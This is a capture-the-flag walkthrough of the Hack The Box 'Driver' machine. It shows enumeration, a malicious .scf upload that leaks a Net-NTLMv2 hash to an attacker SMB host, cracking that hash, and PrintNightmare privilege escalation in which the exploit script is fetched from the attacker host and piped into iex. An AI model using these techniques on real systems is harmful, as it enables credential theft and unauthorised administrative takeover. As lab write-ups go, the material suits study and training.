Driver

Windows:

Reconnaissance: NMAP

┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -O 10.10.11.106

80/tcp  open  http         Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=MFP Firmware Update Center. Please enter password for admin
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).

135/tcp open  msrpc        Microsoft Windows RPC

445/tcp open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)

Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone
Running (JUST GUESSING): Microsoft Windows 2008|Phone (87%)
OS CPE: cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows
Aggressive OS guesses: Microsoft Windows Server 2008 R2 (87%), Microsoft Windows 8.1 Update 1 (85%), Microsoft Windows Phone 7.5 or 8.0 (85%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time: 
|   date: 2024-01-17T07:26:10
|_  start_date: 2024-01-17T07:24:34
|_clock-skew: mean: 6h59m59s, deviation: 0s, median: 6h59m59s

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

┌──(kali💀kali)-[~]
└─$ sudo nmap -sU -O 10.10.11.106    

All 1000 scanned ports on 10.10.11.106 are in ignored states.
Not shown: 1000 open|filtered udp ports (no-response)

Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: specialized|VoIP phone|general purpose|phone
Running: Allen-Bradley embedded, Atcom embedded, Microsoft Windows 7|8|Phone|XP|2012, Palmmicro embedded, VMware Player
OS CPE: cpe:/h:allen-bradley:micrologix_1100 cpe:/h:atcom:at-320 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_server_2012 cpe:/a:vmware:player
OS details: Allen Bradley MicroLogix 1100 PLC, Atcom AT-320 VoIP phone, Microsoft Windows Embedded Standard 7, Microsoft Windows 8.1 Update 1, Microsoft Windows Phone 7.5 or 8.0, Microsoft Windows XP SP3 or Windows 7 or Windows Server 2012, Palmmicro AR1688 VoIP module, VMware Player virtual NAT device

┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -p- 10.10.11.106

80/tcp   open  http         Microsoft IIS httpd 10.0
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=MFP Firmware Update Center. Please enter password for admin
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Microsoft-IIS/10.0

135/tcp  open  msrpc        Microsoft Windows RPC

445/tcp  open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)

5985/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 6h59m59s, deviation: 0s, median: 6h59m59s
| smb2-time: 
|   date: 2024-01-17T07:34:50
|_  start_date: 2024-01-17T07:24:34

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 598.61 seconds

Enumeration: SMB Port 139/445/tcp

Without creds, I can’t connect to the share, or even list them:

┌──(kali💀kali)-[~]
└─$ smbmap -H 10.10.11.106

[*] Detected 1 hosts serving SMB
[*] Established 0 SMB session(s)     

┌──(kali💀kali)-[~]
└─$ smbmap -H 10.10.11.106 -u null

[*] Detected 1 hosts serving SMB
[*] Established 0 SMB session(s) 

┌──(kali💀kali)-[~]
└─$ crackmapexec smb 10.10.11.106 -u '' -p '' --shares
SMB         10.10.11.106    445    DRIVER           [*] Windows 10 Enterprise 10240 x64 (name:DRIVER) (domain:DRIVER) (signing:False) (SMBv1:True)
SMB         10.10.11.106    445    DRIVER           [-] DRIVER\: STATUS_ACCESS_DENIED 
SMB         10.10.11.106    445    DRIVER           [-] Error getting user: list index out of range
SMB         10.10.11.106    445    DRIVER           [-] Error enumerating shares: Error occurs while reading from remote(104)

smbclient -N -L //10.10.11.106
session setup failed: NT_STATUS_ACCESS_DENIED

Enumeration: MSRPC Port 135/tcp

┌──(kali💀kali)-[~]
└─$ rpcclient 10.10.11.106 -U ""
Password for [WORKGROUP\]:
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE

┌──(kali💀kali)-[~]
└─$ enum4linux -a 10.10.11.106 

[E] Server doesn't allow session using username '', password ''.  Aborting remainder of tests.

Enumeration: HTTP Port 80/tcp

Visiting the page returns a request for basic authentication: Firefox isn’t showing me the additional context like nmap did, but looking in Burp at the response it’s there:

When a server wants to request the browser include auth, it will return this 401, and the WWW-Authenticate header says what kind of auth (in this case “Basic”) as well as a realm, which Mozilla docs describe as:

WWW-Authenticate header - HTTP | MDNMDN Web Docs

http://10.10.11.106/
admin
admin

http://10.10.11.106/index.php We as a part of centre of excellence, conducts various tests on multi functional printers such as testing firmware updates, drivers etc. support@driver.htb

http://10.10.11.106/fw_up.php Select printer model and upload the respective firmware update to our file share. Our testing team will review the uploads manually and initiates the testing soon.

┌──(kali💀kali)-[~]
└─$ sudo nano /etc/hosts 
10.10.11.106	driver.htb

Directory Brute Force:

┌──(kali💀kali)-[~]
└─$ gobuster dir -u http://10.10.11.106/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 20 -x php,txt

gobuster dir -u http://driver.htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 20 -x php,txt

/index.php            (Status: 401) [Size: 20]
/images               (Status: 301) [Size: 148] [--> http://driver.htb/images/]
/Images               (Status: 301) [Size: 148] [--> http://driver.htb/Images/]
/Index.php            (Status: 401) [Size: 20]
/IMAGES               (Status: 301) [Size: 148] [--> http://driver.htb/IMAGES/]
/INDEX.php            (Status: 401) [Size: 20]

NIKTO:

┌──(kali💀kali)-[~]
└─$ nikto -h http://10.10.11.106

+ Server: Microsoft-IIS/10.0
+ /: Retrieved x-powered-by header: PHP/7.3.25.
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ / - Requires Authentication for realm 'MFP Firmware Update Center. Please enter password for admin'
+ /: Default account found for 'MFP Firmware Update Center. Please enter password for admin' at (ID 'admin', PW 'admin'). Generic account discovered.. See: CWE-16
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OPTIONS: Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST .
+ OPTIONS: Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST .
+ 8100 requests: 0 error(s) and 6 item(s) reported on remote host
+ End Time:           2024-01-16 21:20:50 (GMT-5) (3071 seconds)

Shell as tony

Capture Net-NTLMv2: The page says that what I upload will go to their file share. That implies it’s not going to the webserver necessarily, so looking for a way to upload webshell doesn’t make much sense.

SMB Share – SCF File AttacksPenetration Testing Lab

A classic attack when you have write access to a file share is to drop a .scf file that references an icon file on an SMB share on an attacker-controlled host. If the folder containing the .scf file is opened with File Explorer, the .scf will inspire Explorer to connect back to get that icon file, and offer Net-NTLMv2 auth negotiation. If I control that host, and I can capture that exchange and try to crack the Net-NTLMv2 using an offline bruteforce (like hashcat). I used this technique on the Insane machine Sizzle back in 2019.

SCF files are Windows Shell Command files, and there are way more references on how to make a malicious one than legit uses. Some old Microsoft pages (that no longer exist, but are on the Wayback Machine) show how to create a Show Desktop Shortcut and a View Channels Quick Launch using SCF files. The format is:

How to re-create the Show desktop icon on the Quick Launch toolbar in Windows XPweb.archive.org

How to Re-create the View Channels Icon on Quick Launch Toolbarweb.archive.org

[Shell]
Command=2
IconFile=<icon file>
[<thing you want to control>]
Command=<command>

Capture Hash: I’ll abuse the IconFile bit, but having it point to my server over SMB, and create exodus.scf:

┌──(kali💀kali)-[~/Desktop]
└─$ nano exodus.scf

[Shell]
Command=2
IconFile=\\10.10.16.4\exodus.ico
[Taskbar]
Command=ToggleDesktop

I’ll start responder, which will start many different kinds of server (including SMB) to listen and try to get Net-NTLMv2 challenges.

┌──(kali💀kali)-[~/Desktop]
└─$ sudo responder -I tun0

[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [OFF]
    Auth proxy                 [OFF]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]
    MQTT server                [ON]
    RDP server                 [ON]
    DCE-RPC server             [ON]
    WinRM server               [ON]
    SNMP server                [OFF]

I’ll upload the .scf file to Driver, and very quickly there’s a hit at responder:

https://hashcat.net/wiki/doku.php?id=example_hasheshashcat.net

http://driver.htb/fw_up.php?msg=SUCCESS

[SMB] NTLMv2-SSP Client   : 10.10.11.106
[SMB] NTLMv2-SSP Username : DRIVER\tony
[SMB] NTLMv2-SSP Hash     : tony::DRIVER:cdcf90285c5b9adb:5D201F35878917D75243727E985ABF12:01010000000000000098EC521C49DA01D54A5C57D4B736020000000002000800390034003700500001001E00570049004E002D00320039005A005300420031004400390049005700510004003400570049004E002D00320039005A00530042003100440039004900570051002E0039003400370050002E004C004F00430041004C000300140039003400370050002E004C004F00430041004C000500140039003400370050002E004C004F00430041004C00070008000098EC521C49DA0106000400020000000800300030000000000000000000000000200000EB1C3AD0CB00338FF1B280D2892AF3A9746C143C189CC28BA74EADB9105AE62D0A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310036002E003400000000000000000000000000 

Crack Hash: The Hashcat example hashes page shows this is mode 5600. It breaks instantly in hashcat to liltony:

┌──(kali💀kali)-[~/Desktop]
└─$ hashcat hash.txt -m 5600 /usr/share/wordlists/rockyou.txt

TONY::DRIVER:cdcf90285c5b9adb:5d201f35878917d75243727e985abf12:01010000000000000098ec521c49da01d54a5c57d4b736020000000002000800390034003700500001001e00570049004e002d00320039005a005300420031004400390049005700510004003400570049004e002d00320039005a00530042003100440039004900570051002e0039003400370050002e004c004f00430041004c000300140039003400370050002e004c004f00430041004c000500140039003400370050002e004c004f00430041004c00070008000098ec521c49da0106000400020000000800300030000000000000000000000000200000eb1c3ad0cb00338ff1b280d2892af3a9746c143c189cc28ba74eadb9105ae62d0a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310036002e003400000000000000000000000000:liltony
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: TONY::DRIVER:cdcf90285c5b9adb:5d201f35878917d752437...000000
Time.Started.....: Wed Jan 17 08:14:59 2024 (0 secs)
Time.Estimated...: Wed Jan 17 08:14:59 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   209.2 kH/s (1.38ms) @ Accel:512 Loops:1 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 33792/14344385 (0.24%)
Rejected.........: 0/33792 (0.00%)
Restore.Point....: 30720/14344385 (0.21%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: !!!!!! -> redlips
Hardware.Mon.#1..: Util: 11%

Started: Wed Jan 17 08:14:33 2024
Stopped: Wed Jan 17 08:15:00 2024

┌──(kali💀kali)-[~/Desktop]
└─$ john hash.txt --format=netntlmv2 --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
liltony          (tony)     
1g 0:00:00:00 DONE (2024-01-17 08:15) 25.00g/s 844800p/s 844800c/s 844800C/s !!!!!!..redlips
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed. 

Crackmapexec: crackmapexec is a nice way to show that the creds work:

┌──(kali💀kali)-[~/Desktop]
└─$ crackmapexec winrm 10.10.11.106 -u tony -p liltony

SMB         10.10.11.106    5985   DRIVER           [*] Windows 10.0 Build 10240 (name:DRIVER) (domain:DRIVER)
HTTP        10.10.11.106    5985   DRIVER           [*] http://10.10.11.106:5985/wsman
HTTP        10.10.11.106    5985   DRIVER           [+] DRIVER\tony:liltony (Pwn3d!)

WinRM: I’ll use Evil-WinRM to connect to WinRM (installed with sudo gem install evil-winrm):

GitHub - Hackplayers/evil-winrm: The ultimate WinRM shell for hacking/pentestingGitHub

┌──(kali💀kali)-[~]
└─$ evil-winrm -i 10.10.11.106 -u tony -p liltony

And grab user.txt:

*Evil-WinRM* PS C:\Users\tony\Desktop> cat user.txt
d6df5511a----------------------------------

Shell as administrator - PrintNightmare

Background: This box was developed as part of the Intro to Printer Exploitation track on HackTheBox. Just as it was in development, PrintNightmare exploded onto the scene (I did a post about it here). Drive was left vulnerable to PrintNightmare as well.

Hack The Boxapp.hackthebox.com

Import Exploit: The Invoke-Nightmare PowerShell script can be run with a low priv shell to add an admin user to the box. I’ll download the exploit with git (and rename the directory to something I’ll recognize:

┌──(kali💀kali)-[~/Desktop]
└─$ git clone https://github.com/calebstewart/CVE-2021-1675

┌──(kali💀kali)-[~/Desktop]
└─$ mv CVE-2021-1675/ invoke-nightmare

Now I can upload the exploit over my WinRM session:

*Evil-WinRM* PS C:\Users\tony\Documents> cd C:\programdata
*Evil-WinRM* PS C:\programdata> upload /home/kali/Desktop/invoke-nightmare/CVE-2021-1675.ps1

However, trying to import the module is blocked by execution policy The simplest way to handle this is to just read it from my host as an HTTP request and pipe that into iex (or Invoke-Expression). I’ll start a Python web server on my host in the directory where the PS1 script is with python3 -m http.server 80, and the request the file:

┌──(kali💀kali)-[~/Desktop]
└─$ python3 -m http.server 80

*Evil-WinRM* PS C:\programdata> curl 10.10.16.4/CVE-2021-1675.ps1 -UseBasicParsing | iex

-UseBasicParsing will allow the file to come back even if the IE engine isn’t available. Now the commandlet is in my current PowerShell session:

*Evil-WinRM* PS C:\programdata> Get-Command Invoke-Nightmare

CommandType     Name                                               Version    Source
-----------     ----                                               -------    ------
Function        Invoke-Nightmare

Shell: By default, Invoke-Nightmare adds a user adm1n with the password “P@ssw0rd”. I’ll use arguments to add my own user and password:

*Evil-WinRM* PS C:\programdata> Invoke-Nightmare -NewUser "0xdf" -NewPassword "0xdf0xdf"
[+] created payload at C:\Users\tony\AppData\Local\Temp\nightmare.dll
[+] using pDriverPath = "C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_f66d9eed7e835e97\Amd64\mxdwdrv.dll"
[+] added user 0xdf as local administrator
[+] deleting payload from C:\Users\tony\AppData\Local\Temp\nightmare.dll

The output shows how it is writing a DLL file as a payload, and then loading it as a driver. This DLL just adds a user to the system as a local administrator. Then the script deletes the DLL. Not only is 0xdf a user on the box, but also is in the Administrators group:

*Evil-WinRM* PS C:\programdata> net user 0xdf
User name                    0xdf
Full Name                    0xdf
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            1/17/2024 1:27:35 PM
Password expires             Never
Password changeable          1/17/2024 1:27:35 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   Never

Logon hours allowed          All

Local Group Memberships      *Administrators
Global Group memberships     *None
The command completed successfully.

WinRM: Connecting as the new user gives me access to the full filesystem:

┌──(kali💀kali)-[~]
└─$ evil-winrm -i 10.10.11.106 -u 0xdf -p 0xdf0xdf

*Evil-WinRM* PS C:\Users\0xdf\Documents> cd C:\users\administrator\desktop
*Evil-WinRM* PS C:\users\administrator\desktop> type root.txt
68bb8ed---------------------------